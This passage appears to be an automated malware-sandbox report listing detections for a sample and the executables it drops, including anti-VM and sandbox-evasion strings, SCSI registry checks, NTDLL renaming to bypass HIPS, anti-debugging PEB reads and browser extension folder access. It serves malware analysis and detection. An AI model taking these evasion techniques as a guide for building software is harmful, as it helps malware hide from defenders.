                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\B096.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\BBE1.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Users\user\AppData\Local\Temp\DF3A.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion:

                barindex
                Yara detected AntiVM3Show sources
                Source: Yara matchFile source: Process Memory Space: B096.exe PID: 6404, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: DF3A.exe PID: 5464, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                Source: Md0q201V1D.exe, 00000003.00000002.338184490.00000000006AB000.00000004.00000020.sdmp, 21.exe, 00000013.00000002.400887733.0000000001F60000.00000004.00000001.sdmp, CBF0.exe, 0000001D.00000002.454053510.000000000323E000.00000004.00000020.sdmpBinary or memory string: ASWHOOK
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL/WINE_GET_UNIX_FILE_NAMEQEMU
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLLUSER
                Checks if the current machine is a virtual machine (disk enumeration)Show sources
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\Desktop\Md0q201V1D.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\21.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Roaming\gbhudtbKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Source: C:\Users\user\AppData\Local\Temp\EBBE.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                Renames NTDLL to bypass HIPSShow sources
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeFile opened: C:\Windows\SysWOW64\ntdll.dll
                Source: C:\Users\user\AppData\Local\Temp\B096.exe TID: 4200Thread sleep time: -922337203685477s >= -30000s
                Source: C:\Users\user\AppData\Local\Temp\C066.exe TID: 7772Thread sleep time: -30000s >= -30000s
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\AppData\Local\Temp\B096.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 571
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F11E.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\F1AC.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CD17.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C295.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C8FE.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DEDC.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\D8D0.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\E64F.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\FD36.exeJump to dropped file
                Source: C:\Windows\explorer.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CAC5.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B576B90 rdtsc
                Source: C:\Users\user\AppData\Local\Temp\B096.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\
                Source: C:\Users\user\AppData\Local\Temp\C066.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: !noValueButYesKeySC:\WINDOWS\system32\drivers\VBoxMouse.sys
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: VMWAREESOFTWARE\VMware, Inc.\VMware Tools
                Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: vmware
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: VMwareVBoxARun using valid operating system
                Source: explorer.exe, 0000000A.00000000.302532259.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
                Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
                Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 0000000A.00000000.333031309.000000000EF11000.00000004.00000001.sdmpBinary or memory string: STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
                Source: explorer.exe, 0000000A.00000000.313810592.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: kernel32.dll/wine_get_unix_file_nameQEMU
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                Source: B096.exe, 00000018.00000003.442159115.00000000065DB000.00000004.00000001.sdmpBinary or memory string: InstallPathKC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\OC:\WINDOWS\system32\drivers\vmmouse.sysMC:\WINDOWS\system32\drivers\vmhgfs.sys
                Source: explorer.exe, 0000000A.00000000.316876167.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                Source: C:\Users\user\Desktop\Md0q201V1D.exeProcess information queried: ProcessInformation
                Source: C:\Users\user\Desktop\Md0q201V1D.exeSystem information queried: ModuleInformation

                Anti Debugging:

                barindex
                Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))Show sources
                Source: C:\Users\user\Desktop\Md0q201V1D.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\21.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Roaming\gbhudtbSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeSystem information queried: CodeIntegrityInformation
                Source: C:\Users\user\Desktop\Md0q201V1D.exeCode function: 0_2_00426B90 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 14_2_02BE0042 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\21.exeCode function: 16_2_02D4D529 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 23_2_02CB0042 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Roaming\gbhudtbCode function: 23_2_02EB2B61 push dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B5A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54F340 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B54DB40 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B7A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B573B7A mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B5D6365 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B618B58 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\AppData\Local\Temp\CBF0.exeCode function: 29_2_6B56A309 mov eax, dword ptr fs:[00000030h]
